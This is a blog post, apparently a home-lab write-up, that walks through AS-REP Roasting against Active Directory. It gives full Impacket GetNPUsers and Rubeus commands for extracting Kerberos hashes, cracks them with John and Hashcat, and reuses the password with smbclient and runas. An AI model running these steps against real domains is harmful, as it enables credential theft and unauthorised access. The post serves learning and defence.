In this post, I'm learning about Kerberos and one of its attacks. Specifically, I'm learning about Authentication Service Response (AS-REP) Roasting. Based on my learnings, this is an attack that should be highly unlikely today, as by default, in Active Directory, it is more likely the feature that enables this attack is disabled. I am, as always, doing this from the perspective of enhancing my learning. In this post, I learned more about Kerberoasting.
First up, here is what a normal Active Directory Kerberos authentication looks like within the first 4 packets.
┌──(rootđź’€securitynik)-[~/packets] └─# tshark -n -r AD-Authentication.pcapng -Y '(kerberos.msg_type == 10) || (kerberos.msg_type == 11) || (kerberos.msg_type == 30)' 8 10.244059 10.0.0.108 → 10.0.0.5 KRB5 311 AS-REQ 9 10.248297 10.0.0.5 → 10.0.0.108 KRB5 258 KRB Error: KRB5KDC_ERR_PREAUTH_REQUIRED 16 10.259148 10.0.0.108 → 10.0.0.5 KRB5 391 AS-REQ 17 10.261119 10.0.0.5 → 10.0.0.108 KRB5 2131 AS-REP 153 28.562552 10.0.0.108 → 10.0.0.5 KRB5 294 AS-REQ
As shown in packet 8, the client makes a request.
In packet 9, the server responds with a KRB ERROR, stating pre-authentication is required. Without this pre-authentication requirement, someone would be able to request Ticket Granting Ticket (TGT) for those users who do not have this feature enabled and then crack the user's password. Once you have the cracked password, then you can authenticate as that user.
Looking at this in practice, from an Active Directory perspective, the user would have to deliberately disable the pre-authentication as shown below.
Let's now leverage a tool from the Impacket suite of tools to see which accounts have pre-authentication disabled. Let's say we have a have access to a low level account that is just a member of Domain Users, we can use that account and impacket-GetNP to learn about users with pre-authentication disabled.
┌──(rootđź’€securitynik)-[~] └─# impacket-GetNPUsers -dc-ip 10.0.0.5 -ts securitynik.local/nakia:Testing1 Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation Name MemberOf PasswordLastSet LastLogon UAC ----- ----------------------------------------------------------------------------- -------------------------- -------------------------- -------- neysa CN=24-baez64102-admingroup,OU=Groups,OU=SEC,OU=Tier 2,DC=securitynik,DC=local 2021-02-13 17:37:20.397803 2021-11-17 02:18:18.769182 0x410200
Now that we know a user has pre-authentication check disabled, let's request a ticket on this user behalf. At the same time, I will output the contents to a file and provide that file to John to crack.
┌──(rootđź’€securitynik)-[~] └─# impacket-GetNPUsers -dc-ip 10.0.0.5 -ts securitynik.local/nakia:Testing1 -request -format john -outputfile no-preauth.john Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation Name MemberOf PasswordLastSet LastLogon UAC ----- ----------------------------------------------------------------------------- -------------------------- -------------------------- -------- neysa CN=24-baez64102-admingroup,OU=Groups,OU=SEC,OU=Tier 2,DC=securitynik,DC=local 2021-02-13 17:37:20.397803 2021-11-17 02:18:18.769182 0x410200
When we cat the file, we see ...
┌──(rootđź’€securitynik)-[~] └─# cat no-preauth.john $krb5asrep$neysa@SECURITYNIK.LOCAL:3032d987619dfe5bba1bda3905f2b61e$ccd95cf20d0eff70f1e7fdadd372ca250451335cd5c30960f7f3f8c1dfa545169c73c31ca970b89ca6c5ee06cdaec5cfaea66fbcdaf0fa8e859fdbd791c9c6cbf9a699cfead4d078cdc48d44a971ebea0c76680e14c21028b5c22c9ef27999f77c867d260967b5fee9eb593a0e2fe6f4ca69188f37bdb36241761a7d4699d2a15a35fdeed80213b33ba95613fb349a9868aa178986891619705fbf6820d4e768a0477fa0964cf5608fa90dea33a2f5da58b74a24b967937fcdc436af26f65699c7b3fdc9f298289b0cb91674575df83f97f33076df7f93853462deb375528fa548aab4fda4ac6f04be421b0c6d46a4fd32585bc4948b
We can now provide the file to John, with our wordlist.
Before giving the password to John, what did the query look like on the wire.
┌──(rootđź’€securitynik)-[~/packets] └─# tshark -n -r no-preauth.pcap -Y '(kerberos.msg_type == 10) || (kerberos.msg_type == 11) || (kerberos.msg_type == 30)' 4 0.000441 10.0.0.107 → 10.0.0.5 KRB5 246 AS-REQ 5 0.002625 10.0.0.5 → 10.0.0.107 KRB5 2376 AS-REP
As seen above, there is no pre-authentication message in this capture as was seen in the first capture.
Feeding the file to John.
┌──(rootđź’€securitynik)-[~] └─# john --format=krb5asrep no-preauth.john --wordlist=~/SEC-504/pass.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Warning: Only 5 candidates left, minimum 16 needed for performance. Testing1 ($krb5asrep$neysa@SECURITYNIK.LOCAL) 1g 0:00:00:00 DONE (2021-11-17 03:33) 50.00g/s 250.0p/s 250.0c/s 250.0C/s sans..Testing1 Use the "--show" option to display all of the cracked passwords reliably Session completed
Voila, now we have the user's password and username and thus can reuse it to gain access. Let's try listing any shares on the remote machines, using smbclient.
┌──(rootđź’€securitynik)-[~/packets] └─# smbclient --list=10.0.0.5 --user=SECURITYNIK/neysa%Testing1 --max-protocol SMB3 --encrypt Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available
Leveraging Rubeus for AS-REP Roasting
Now that I understand how to use Impacket for this, time to look at another tool, Rubeus.
C:\Tools>Rubeus.exe asreproast /format:hashcat /dc:dc-2019.securitynik.local /outfile:asrep-roast.hashes ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.6.4 [*] Action: AS-REP roasting [*] Target Domain : securitynik.local [*] Target DC : dc-2019.securitynik.local [*] Searching path 'LDAP://dc-2019.securitynik.local/DC=securitynik,DC=local' for AS-REP roastable users [*] SamAccountName : neysa [*] DistinguishedName : CN=Neysa,OU=SecurityNik-Users,DC=securitynik,DC=local [*] Using domain controller: dc-2019.securitynik.local (10.0.0.5) [*] Building AS-REQ (w/o preauth) for: 'securitynik.local\neysa' [+] AS-REQ w/o preauth successful! [*] Hash written to C:\Tools\asrep-roast.hashes [*] Roasted hashes written to : C:\Tools\asrep-roast.hashes
Looking at the contents of the file.
C:\Tools> type asrep-roast.hashes $krb5asrep$23$neysa@securitynik.local:4F4D040B3DFFBEEAC4761AA7B5F62C11$39EFEBF767A19822771789E8AA0286ACA05383F57F421D12C7D2F12E285F6E4386A3C102C3B252B120B07DE1736B80D27098907D1122C45FA79E2CF48843D16E8F96D2E1F59DFAE340610B2F1EF193D634E5954A83CF340CB003AD4EED34B84DEAF1170750C59C8371DECB21949A61A97D8FD66153527F7322AB5BD54F7285EDAF14BCF6B20C4C6E2480EC859DB8C3D784D7BCC8559FAF6A2DE7C20DAD89FD54CF65ABAC8EA92FFB4F313691DDF7EA3255486092845C3CBEB2B55B569BA5923AAFB15B01379B9C919E43F9F0F321AABFFBD16D53F877A650D65ECA2B56741C5D17BCC73DD69A495AFC94ADF77578629CC9C95750002C
Passing the file to Hashcat. we see the password at the end of the line below.
D:\TOOLS\hashcat-6.2.4>hashcat.exe --attack-mode 0 --hash-type 18200 c:\tmp\asrep-roast.hashes ..\pass.txt hashcat (v6.2.4) starting ... $krb5asrep$23$neysa@securitynik.local:4f4d040b3dffbeeac4761aa7b5f62c11$39efebf767a19822771789e8aa0286aca05383f57f421d12c7d2f12e285f66e4386a3c102c3b252b120b07de1736b80d27098907d1122c45fa79e2cf48843d16e8f96d2e1f59dfae340610b2f1ef193d634e5954a83cf340cb003ad4eed34b84deeaf1170750c59c8371decb21949a61a97d8fd66153527f7322ab5bd54f7285edaf14bcf6b20c4c6e2480ec859db8c3d784d7bcc8559faf6a2de7c20dad89fd54cf65aabac8ea92ffb4f313691ddf7ea3255486092845c3cbeb2b55b569ba5923aafb15b01379b9c919e43f9f0f321aabffbd16d53f877a650d65eca2b56741c5d17bcc73ddd69a495afc94adf77578629cc9c95750002c:Testing1
As before, now that we have the password, we can authenticate
C:\Tools>runas /user:securitynik\neysa cmd.exe Enter the password for securitynik\neysa: Attempting to start cmd.exe as user "securitynik\neysa" ...
Good start. That was a good piece of learning for me, as I look to expand my knowledge on Kerberos.
References:
No comments:
Post a Comment